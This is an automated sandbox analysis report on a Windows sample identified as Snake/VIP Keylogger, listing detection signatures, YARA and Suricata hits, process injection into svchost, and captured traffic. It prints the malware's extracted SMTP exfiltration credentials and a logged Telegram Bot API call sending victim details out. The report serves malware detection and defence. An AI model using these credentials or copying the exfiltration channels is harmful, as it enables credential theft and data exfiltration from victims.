Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
lsc5QN46NH.exe

Overview

General Information

Sample name:lsc5QN46NH.exe
renamed because original name is a hash value
Original sample name:6b5bfda5580a6bd8ec3062f4d33b09c0f91722d824e80ae0cb8d47e8b1b2fcb7.exe
Analysis ID:1588171
MD5:7a6425553456c5f24bb5c8e235574c72
SHA1:6d825e1a1238c4a4f26966c281507e5e704c5500
SHA256:6b5bfda5580a6bd8ec3062f4d33b09c0f91722d824e80ae0cb8d47e8b1b2fcb7
Tags:exeRedLineStealeruser-adrian__luca
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • lsc5QN46NH.exe (PID: 6644 cmdline: "C:\Users\user\Desktop\lsc5QN46NH.exe" MD5: 7A6425553456C5F24BB5C8E235574C72)
    • svchost.exe (PID: 6012 cmdline: "C:\Users\user\Desktop\lsc5QN46NH.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "nedusnke@grupokoman.com", "Password": "LKDS6_DcR%g3", "Host": "mail.grupokoman.com", "Port": "587"}
{"Exfil Mode": "SMTP", "Username": "nedusnke@grupokoman.com", "Password": "LKDS6_DcR%g3", "Host": "mail.grupokoman.com", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000002.00000002.3932473791.0000000000400000.00000040.80000000.00040000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
  • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x1300:$s3: 83 EC 38 53 B0 13 88 44 24 2B 88 44 24 2F B0 E2 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1fdd0:$s5: delete[]
  • 0x1f288:$s6: constructor or from DllMain.
00000000.00000002.1516446502.00000000021A0000.00000004.00001000.00020000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
  • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x700:$s3: 83 EC 38 53 B0 13 88 44 24 2B 88 44 24 2F B0 E2 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1e9d0:$s5: delete[]
  • 0x1de88:$s6: constructor or from DllMain.
00000002.00000002.3936515105.00000000063C3000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
        Click to see the 28 entries
        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.400000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
        • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
        • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
        • 0x700:$s3: 83 EC 38 53 B0 13 88 44 24 2B 88 44 24 2F B0 E2 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
        • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
        • 0x1e9d0:$s5: delete[]
        • 0x1de88:$s6: constructor or from DllMain.
        2.2.svchost.exe.400000.0.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
        • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
        • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
        • 0x1300:$s3: 83 EC 38 53 B0 13 88 44 24 2B 88 44 24 2F B0 E2 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
        • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
        • 0x1fdd0:$s5: delete[]
        • 0x1f288:$s6: constructor or from DllMain.
        2.2.svchost.exe.7c00f20.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          2.2.svchost.exe.7c00f20.2.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
            2.2.svchost.exe.7c00f20.2.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
              Click to see the 76 entries

              System Summary

              barindex
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\lsc5QN46NH.exe", CommandLine: "C:\Users\user\Desktop\lsc5QN46NH.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\lsc5QN46NH.exe", ParentImage: C:\Users\user\Desktop\lsc5QN46NH.exe, ParentProcessId: 6644, ParentProcessName: lsc5QN46NH.exe, ProcessCommandLine: "C:\Users\user\Desktop\lsc5QN46NH.exe", ProcessId: 6012, ProcessName: svchost.exe
              Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\lsc5QN46NH.exe", CommandLine: "C:\Users\user\Desktop\lsc5QN46NH.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\lsc5QN46NH.exe", ParentImage: C:\Users\user\Desktop\lsc5QN46NH.exe, ParentProcessId: 6644, ParentProcessName: lsc5QN46NH.exe, ProcessCommandLine: "C:\Users\user\Desktop\lsc5QN46NH.exe", ProcessId: 6012, ProcessName: svchost.exe
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T22:13:38.298023+010028033053Unknown Traffic192.168.2.849706104.21.80.1443TCP
              2025-01-10T22:13:41.639770+010028033053Unknown Traffic192.168.2.849712104.21.80.1443TCP
              2025-01-10T22:13:46.038913+010028033053Unknown Traffic192.168.2.849721104.21.80.1443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T22:13:36.248694+010028032742Potentially Bad Traffic192.168.2.849704193.122.130.080TCP
              2025-01-10T22:13:37.733222+010028032742Potentially Bad Traffic192.168.2.849704193.122.130.080TCP
              2025-01-10T22:13:38.842442+010028032742Potentially Bad Traffic192.168.2.849707193.122.130.080TCP
              2025-01-10T22:13:39.951861+010028032742Potentially Bad Traffic192.168.2.849709193.122.130.080TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T22:13:46.957061+010018100071Potentially Bad Traffic192.168.2.849723149.154.167.220443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "nedusnke@grupokoman.com", "Password": "LKDS6_DcR%g3", "Host": "mail.grupokoman.com", "Port": "587", "Version": "4.4"}
              Source: 2.2.svchost.exe.7ca0000.4.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "nedusnke@grupokoman.com", "Password": "LKDS6_DcR%g3", "Host": "mail.grupokoman.com", "Port": "587"}
              Source: lsc5QN46NH.exeVirustotal: Detection: 31%Perma Link
              Source: lsc5QN46NH.exeReversingLabs: Detection: 21%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: lsc5QN46NH.exeJoe Sandbox ML: detected

              Location Tracking

              barindex
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: lsc5QN46NH.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.8:49705 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49723 version: TLS 1.2
              Source: Binary string: _.pdb source: svchost.exe, 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.3933759853.0000000003374000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: lsc5QN46NH.exe, 00000000.00000003.1513568733.0000000003DB0000.00000004.00001000.00020000.00000000.sdmp, lsc5QN46NH.exe, 00000000.00000003.1514623709.0000000003F50000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: lsc5QN46NH.exe, 00000000.00000003.1513568733.0000000003DB0000.00000004.00001000.00020000.00000000.sdmp, lsc5QN46NH.exe, 00000000.00000003.1514623709.0000000003F50000.00000004.00001000.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_0066445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0066445A
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_0066C6D1 FindFirstFileW,FindClose,0_2_0066C6D1
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_0066C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0066C75C
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_0066EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0066EF95
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_0066F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0066F0F2
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_0066F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0066F3F3
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_006637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_006637EF
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_00663B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00663B12
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_0066BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0066BCBC
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 09042834h2_2_09042580
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 09043206h2_2_09042DE8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 09040D10h2_2_09040B30
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0904169Ah2_2_09040B30
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0904D3D4h2_2_0904D128
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 09043206h2_2_09043134
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0904D82Ch2_2_0904D580
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0904DC84h2_2_0904D9D8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 09043206h2_2_09042DE2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_09040040
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0904FAECh2_2_0904F840
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_09040856
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0904CF7Ch2_2_0904CCD0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0904EDE4h2_2_0904EB38
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0904F23Ch2_2_0904EF90
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0904F694h2_2_0904F3E8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0904E0DCh2_2_0904DE30
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_09040676
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0904E534h2_2_0904E288
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0904E98Ch2_2_0904E6E0

              Networking

              barindex
              Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.8:49723 -> 149.154.167.220:443
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 193.122.130.0 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.80.1 443Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 149.154.167.220 443Jump to behavior
              Source: unknownDNS query: name: api.telegram.org
              Source: Yara matchFile source: 2.3.svchost.exe.326b000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.7c00000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.7ca0000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.3.svchost.exe.326bf20.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.7c00f20.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2011/01/2025%20/%2002:29:40%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
              Source: Joe Sandbox ViewIP Address: 193.122.130.0 193.122.130.0
              Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: unknownDNS query: name: checkip.dyndns.org
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49704 -> 193.122.130.0:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49709 -> 193.122.130.0:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49707 -> 193.122.130.0:80
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49706 -> 104.21.80.1:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49721 -> 104.21.80.1:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49712 -> 104.21.80.1:443
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.8:49705 version: TLS 1.0
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_006722EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_006722EE
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2011/01/2025%20/%2002:29:40%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
              Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
              Source: global trafficDNS traffic detected: DNS query: api.telegram.org
